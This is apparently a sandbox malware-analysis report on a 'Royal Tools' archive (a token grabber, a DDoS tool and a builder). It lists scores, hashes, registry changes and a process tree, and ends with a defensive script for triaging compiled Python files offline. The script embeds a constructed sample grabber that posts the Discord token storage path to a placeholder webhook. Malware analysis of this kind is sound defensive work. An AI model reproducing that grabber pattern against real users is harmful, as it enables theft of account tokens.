Overview (overall score: 7)

Per-target scores (the score badge follows each row in the original layout):

Target                  Platform              Score
Static                  -                     3
Royal_Tools.rar         windows7-x64          3
Royal_Tools.rar         windows10-2004-x64    3
Royal Tool...er.exe     windows7-x64          7
Royal Tool...er.exe     windows10-2004-x64    7
builder.pyc             windows7-x64          3
builder.pyc             windows10-2004-x64    3
Royal Tool...OS.exe     windows7-x64          7
Royal Tool...OS.exe     windows10-2004-x64    7
RoyalToolsDDOS.pyc      windows7-x64          3
RoyalToolsDDOS.pyc      windows10-2004-x64    3
Royal Tool...ns.txt     windows7-x64          1
Royal Tool...ns.txt     windows10-2004-x64    1
Royal Tools/royal.exe   windows7-x64          7
Royal Tools/royal.exe   windows10-2004-x64    7
royal.pyc               windows7-x64          3
royal.pyc               windows10-2004-x64    3
Royal Tools/royal.log   windows7-x64          1
Royal Tools/royal.log   windows10-2004-x64    1
Analysis

max time kernel: 1562s
max time network: 1563s
platform: windows7_x64
resource: win7-20240611-en
resource tags: arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
submitted: 19-06-2024 00:46
Behavioral tasks

behavioral1:  Royal_Tools.rar  (win7-20240611-en)
behavioral2:  Royal_Tools.rar  (win10v2004-20240611-en)
behavioral3:  Royal Tools/Royal Grabber.exe  (win7-20231129-en)
behavioral4:  Royal Tools/Royal Grabber.exe  (win10v2004-20240508-en)
behavioral5:  builder.pyc  (win7-20240419-en)
behavioral6:  builder.pyc  (win10v2004-20240508-en)
behavioral7:  Royal Tools/RoyalToolsDDOS.exe  (win7-20240611-en)
behavioral8:  Royal Tools/RoyalToolsDDOS.exe  (win10v2004-20240508-en)
behavioral9:  RoyalToolsDDOS.pyc  (win7-20240220-en)
behavioral10: RoyalToolsDDOS.pyc  (win10v2004-20240508-en)
behavioral11: Royal Tools/gennedTokens.txt  (win7-20240508-en)
behavioral12: Royal Tools/gennedTokens.txt  (win10v2004-20240611-en)
behavioral13: Royal Tools/royal.exe  (win7-20240611-en)
behavioral14: Royal Tools/royal.exe  (win10v2004-20240611-en)
behavioral15: royal.pyc  (win7-20240611-en)
behavioral16: royal.pyc  (win10v2004-20240611-en)
behavioral17: Royal Tools/royal.log  (win7-20240508-en)
behavioral18: Royal Tools/royal.log  (win10v2004-20240508-en)
General

Target: royal.pyc
Size: 141KB
MD5: fb0817bc4cb8ba07d7e316190adbffb9
SHA1: 5547a663d2aae52f03f364b959bae1f38bf97bc8
SHA256: d7aa2af55a675d429d350e65151f487e847983cd495f962cc857731173e3d25e
SHA512: 99288aa848c739036f94ee5d59d31e71b7493bb485c00c26df3831eb5845c9f58fbb326c11cac94bc5a9f8e040f0a296f9681c6dbf2820225fffc548416f79a3
SSDEEP: 1536:pcNTfRgwpcEOgGMhYlWDF8VVe2mWJUvRXjXDlLiu4lSESA8obNj8M/JLpNVP:iLpcEONkQOFmVeUq1Ziu4lSEaobN/1
Malware Config
Signatures

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Modifies registry class (9 IoCs)
  Process: rundll32.exe
  Set value (str): \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\.pyc\ = "pyc_auto_file"
  Key created:     \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pyc_auto_file\shell\Read
  Key created:     \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pyc_auto_file\shell
  Set value (str): \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pyc_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\""
  Key created:     \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pyc_auto_file
  Set value (str): \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pyc_auto_file\
  Key created:     \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\.pyc
  Key created:     \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pyc_auto_file\shell\Read\command
  Key created:     \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_Classes\Local Settings

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Process: AcroRd32.exe (PID 2624)

Suspicious use of SetWindowsHookEx (2 IoCs)
  Process: AcroRd32.exe (PID 2624), two occurrences

Suspicious use of WriteProcessMemory (7 IoCs)
  PID 2560 cmd.exe      wrote to memory of PID 2980 rundll32.exe  (x3)
  PID 2980 rundll32.exe wrote to memory of PID 2624 AcroRd32.exe  (x4)
Processes

C:\Windows\system32\cmd.exe (PID 2560)
  cmd /c C:\Users\Admin\AppData\Local\Temp\royal.pyc
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\rundll32.exe (PID 2980, child of 2560)
    "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\royal.pyc
    - Modifies registry class
    - Suspicious use of WriteProcessMemory

    C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe (PID 2624, child of 2980)
      "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\royal.pyc"
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of SetWindowsHookEx

Note on this chain: the analysis VM has no handler registered for .pyc, so cmd /c handed the file to the shell's Open With dialog (shell32.dll,OpenAs_RunDLL). That dialog is what created the pyc_auto_file association under the user's HKCU Classes hive and launched Adobe Reader on the file. No Python interpreter ran, so every signature in this task is an artifact of the sandbox and the OS, not behaviour of royal.pyc. The compiled module has to be examined statically or under a matching CPython.
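Because the sandbox never executed the compiled module, the practical first step is offline triage of the .pyc itself: read the PEP 552 header to learn which CPython produced it, and only under that interpreter unmarshal the code object and list the globals and string constants it references (webhook URLs, browser profile paths, and similar are usually visible at this layer). The following is an added example written for this page, not code from the report or from the Royal Tools author; the magic-number table is copied from CPython's importlib/_bootstrap_external.py, and SAMPLE_SOURCE is a constructed stand-in module, not the contents of royal.pyc.

```python
"""Offline triage of a CPython .pyc: identify the producing interpreter, then
unmarshal (never exec) the code object and dump names and strings."""
import importlib.util
import marshal
import os
import py_compile
import struct
import tempfile
import types

# Release magic numbers (first two header bytes, little-endian), from
# CPython's importlib/_bootstrap_external.py. Extend for other releases.
MAGIC_TO_VERSION = {
    3394: "3.7", 3413: "3.8", 3425: "3.9", 3439: "3.10",
    3495: "3.11", 3531: "3.12", 3571: "3.13",
}


def parse_pyc_header(data: bytes) -> dict:
    """Decode the 16-byte PEP 552 header of a CPython 3.7+ .pyc."""
    if len(data) < 16 or data[2:4] != b"\r\n":
        raise ValueError("not a CPython 3.x .pyc header")
    magic = struct.unpack("<H", data[:2])[0]
    flags = struct.unpack("<I", data[4:8])[0]
    info = {
        "magic": magic,
        "python_version": MAGIC_TO_VERSION.get(magic, "unknown"),
        "hash_based": bool(flags & 1),  # bit 0 set: hash-based pyc, else timestamp-based
    }
    if info["hash_based"]:
        info["source_hash"] = data[8:16].hex()  # SipHash of the original source
    else:
        info["source_mtime"], info["source_size"] = struct.unpack("<II", data[8:16])
    return info


def code_strings(code: types.CodeType) -> dict:
    """Collect global names (imports, attributes, calls) and string constants,
    descending into nested function and class code objects."""
    names, strings = set(code.co_names), set()
    for const in code.co_consts:
        if isinstance(const, str):
            strings.add(const)
        elif isinstance(const, tuple):  # e.g. from-import name lists, kwnames
            strings.update(x for x in const if isinstance(x, str))
        elif isinstance(const, types.CodeType):
            nested = code_strings(const)
            names |= nested["names"]
            strings |= nested["strings"]
    return {"names": names, "strings": strings}


def triage_pyc(data: bytes) -> dict:
    """Header fields plus, when this interpreter's magic matches, the names and
    strings of the unmarshalled code object. On a mismatch, stop: the marshal
    format changes between releases, so unmarshal under the matching CPython
    (or hand the file to a decompiler that supports that release)."""
    info = parse_pyc_header(data)
    if data[:4] != importlib.util.MAGIC_NUMBER:
        info["note"] = "magic differs from this interpreter; not unmarshalled"
        return info
    # marshal.loads only rebuilds the code object; it does not run it.
    info.update(code_strings(marshal.loads(data[16:])))
    return info


def compile_sample_to_pyc(source: str) -> bytes:
    """Build a .pyc with the running interpreter (for the constructed sample)."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "sample.py")
        with open(src, "w", encoding="utf-8") as fh:
            fh.write(source)
        pyc = py_compile.compile(src, cfile=os.path.join(tmp, "sample.pyc"), doraise=True)
        with open(pyc, "rb") as fh:
            return fh.read()


# Constructed stand-in for a small grabber module; NOT the contents of royal.pyc.
SAMPLE_SOURCE = '''
import os
import requests
WEBHOOK = "https://example.invalid/api/webhooks/0000"

def grab():
    leveldb = os.path.join(os.getenv("APPDATA", ""), "discord", "Local Storage", "leveldb")
    requests.post(WEBHOOK, json={"path": leveldb})
'''

if __name__ == "__main__":
    result = triage_pyc(compile_sample_to_pyc(SAMPLE_SOURCE))
    print("python:", result["python_version"], "hash-based:", result["hash_based"])
    print("names:", sorted(result.get("names", [])))
    print("strings:", sorted(result.get("strings", [])))
```

For the real sample, replace the constructed bytes with `open("royal.pyc", "rb").read()`; if the reported version is not the one you are running, switch interpreters rather than forcing the unmarshal, and keep the file on an isolated host since the next step after string review is usually a decompiler, not execution.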
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 3KB
MD5: 971b9ba8846b3a0491ba2092c6b0f744
SHA1: 1c33436ad5da872a02c960fea7a8ac3eb8c5e488
SHA256: 78d73534da0c7d199b1284be50b92892b8237a68d452dc32d896abf39ab33935
SHA512: 8221dcae1041d03a576d5e5894f59b46f0d58a621ea007ca4a780ef732522a742a5cc853cf65ca8cb586750cca3a5fc924a7d1c5fbd6a48b1768da9e6e0a0554